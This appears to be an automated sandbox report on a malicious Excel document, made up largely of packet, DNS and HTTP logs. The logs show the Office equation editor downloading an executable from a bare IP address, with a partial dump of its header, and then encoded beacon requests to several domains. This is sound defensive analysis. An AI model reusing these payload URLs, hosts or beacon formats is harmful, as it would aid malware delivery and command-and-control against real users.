                                                                                                                                                  Jul 22, 2021 17:15:02.789097071 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.789216042 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.789858103 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.833070993 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.833103895 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.833125114 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.833147049 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.833396912 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.876674891 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876698971 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876715899 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876730919 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876743078 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.876748085 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876764059 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876782894 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876785994 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.876800060 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.876806974 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.876828909 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920212030 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920245886 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920284033 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920306921 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920308113 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920324087 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920327902 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920336008 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920341969 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920362949 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920372009 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920388937 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920408010 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920408010 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920432091 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920454979 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920476913 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920480967 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920484066 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920488119 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920490980 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920506954 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920514107 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920535088 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920537949 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920561075 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920564890 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920586109 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920594931 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920612097 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.920625925 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.920636892 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.921998024 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.963999033 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964061022 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964101076 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964103937 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964144945 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964188099 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964200020 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964207888 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964229107 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964265108 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964304924 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964306116 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964318991 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964330912 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964343071 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964344025 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964381933 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964411020 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964425087 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964443922 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964449883 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964452982 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964483023 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964484930 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964512110 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964534998 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964536905 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964549065 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964562893 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964571953 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964589119 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964596987 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964612961 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964621067 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964638948 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964648962 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964664936 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964673042 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964695930 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964699984 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964724064 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964729071 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964750051 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964759111 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964776039 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964783907 CEST4916580192.168.2.223.121.113.175

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jul 22, 2021 17:16:37.906949043 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:16:38.297278881 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.574949026 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:48.827698946 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:16:49.840526104 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:16:49.950583935 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:51.092057943 CEST53528388.8.8.8192.168.2.22

                                                                                                                                                  ICMP Packets

                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                  Jul 22, 2021 17:16:51.093327045 CEST192.168.2.228.8.8.8d041(Port unreachable)Destination Unreachable

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Jul 22, 2021 17:16:37.906949043 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.pon.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.574949026 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.intoxickiss.comA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:48.827698946 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.800pls.infoA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:49.840526104 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.800pls.infoA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Jul 22, 2021 17:16:38.297278881 CEST8.8.8.8192.168.2.220x2e78No error (0)www.pon.xyz71822.bodis.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:38.297278881 CEST8.8.8.8192.168.2.220x2e78No error (0)71822.bodis.com199.59.242.153A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST8.8.8.8192.168.2.220x2f03No error (0)www.intoxickiss.comintoxickiss.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST8.8.8.8192.168.2.220x2f03No error (0)intoxickiss.com151.101.0.119A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST8.8.8.8192.168.2.220x2f03No error (0)intoxickiss.com151.101.64.119A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST8.8.8.8192.168.2.220x2f03No error (0)intoxickiss.com151.101.128.119A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST8.8.8.8192.168.2.220x2f03No error (0)intoxickiss.com151.101.192.119A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:49.950583935 CEST8.8.8.8192.168.2.220x3c4eName error (3)www.800pls.infononenoneA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:51.092057943 CEST8.8.8.8192.168.2.220x3c4eName error (3)www.800pls.infononenoneA (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 3.121.113.175
                                                                                                                                                  • www.pon.xyz
                                                                                                                                                  • www.intoxickiss.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.22491653.121.113.17580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:15:02.789858103 CEST0OUTGET /www/pool.exe HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: 3.121.113.175
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jul 22, 2021 17:15:02.833070993 CEST1INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:14:54 GMT
                                                                                                                                                  Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                                                                                  Last-Modified: Thu, 22 Jul 2021 05:09:55 GMT
                                                                                                                                                  ETag: "ae200-5c7af4c3e3d9d"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 713216
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cc df f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d8 0a 00 00 08 00 00 00 00 00 00 ce f6 0a 00 00 20 00 00 00 00 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c f6 0a 00 4f 00 00 00 00 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec d6 0a 00 00 20 00 00 00 d8 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 0b 00 00 06 00 00 00 da 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0b 00 00 02 00 00 00 e0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 f6 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc e1 00 00 70 eb 00 00 03 00 00 00 01 00 00 06 4c cd 01 00 30 29 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 45 02 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 33 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 34 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 35 00 00 0a 6f 36 00 00 0a 73 37 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`P @ @@|O H.text `.rsrc@@.reloc @BHpL0)0( (!(o"*(#($(%(&('*N(oE((*&()*s*s+s,s-s.*0~o/+*0~o0+*0~o1+*0~o2+*0~o3+*0<~(4,!rp(5o6s7~+*0~


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.2249166199.59.242.15380C:\Windows\explorer.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:16:38.442984104 CEST755OUTGET /wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz HTTP/1.1
                                                                                                                                                  Host: www.pon.xyz
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Jul 22, 2021 17:16:38.568079948 CEST756INHTTP/1.1 200 OK
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:16:38 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NfckuEfRDoobrXb4RjADejgmV/38jhHArz5PznadVW/EOMjYWMA8MO/wUYEIfOHtudiTqbwWGyf8XYQ99hFcOA==
                                                                                                                                                  Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4e 66 63 6b 75 45 66 52 44 6f 6f 62 72 58 62 34 52 6a 41 44 65 6a 67 6d 56 2f 33 38 6a 68 48 41 72 7a 35 50 7a 6e 61 64 56 57 2f 45 4f 4d 6a 59 57 4d 41 38 4d 4f 2f 77 55 59 45 49 66 4f 48 74 75 64 69 54 71 62 77 57 47 79 66 38 58 59 51 39 39 68 46 63 4f 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                                                                                                  Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NfckuEfRDoobrXb4RjADejgmV/38jhHArz5PznadVW/EOMjYWMA8MO/wUYEIfOHtudiTqbwWGyf8XYQ99hFcOA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.2249167151.101.0.11980C:\Windows\explorer.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:16:43.686728001 CEST760OUTGET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1
                                                                                                                                                  Host: www.intoxickiss.com
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Jul 22, 2021 17:16:43.832999945 CEST761INHTTP/1.1 302 Found
                                                                                                                                                  server: adobe
                                                                                                                                                  cache-control: no-cache, no-store, private, must-revalidate, max-age=0, max-stale=0, post-check=0, pre-check=0
                                                                                                                                                  location: https://portfolio.adobe.com/missing
                                                                                                                                                  x-trace-id: nhEa/ME/ozF9cbxuUwEh+E96PhQ
                                                                                                                                                  x-app-name: Pro2-Renderer
                                                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:16:43 GMT
                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                  Connection: close
                                                                                                                                                  X-Served-By: cache-hhn4076-HHN
                                                                                                                                                  X-Cache: MISS
                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                  X-Timer: S1626967004.724224,VS0,VE99
                                                                                                                                                  Vary: Fastly-SSL, X-Use-Renderer


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  Analysis Process: EXCEL.EXE PID: 2384 Parent PID: 584

                                                                                                                                                  General

                                                                                                                                                  Start time:17:14:41
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x13fcd0000
                                                                                                                                                  File size:27641504 bytes
                                                                                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: EQNEDT32.EXE PID: 3024 Parent PID: 584

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:03
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  Wow64 process (32bit):true
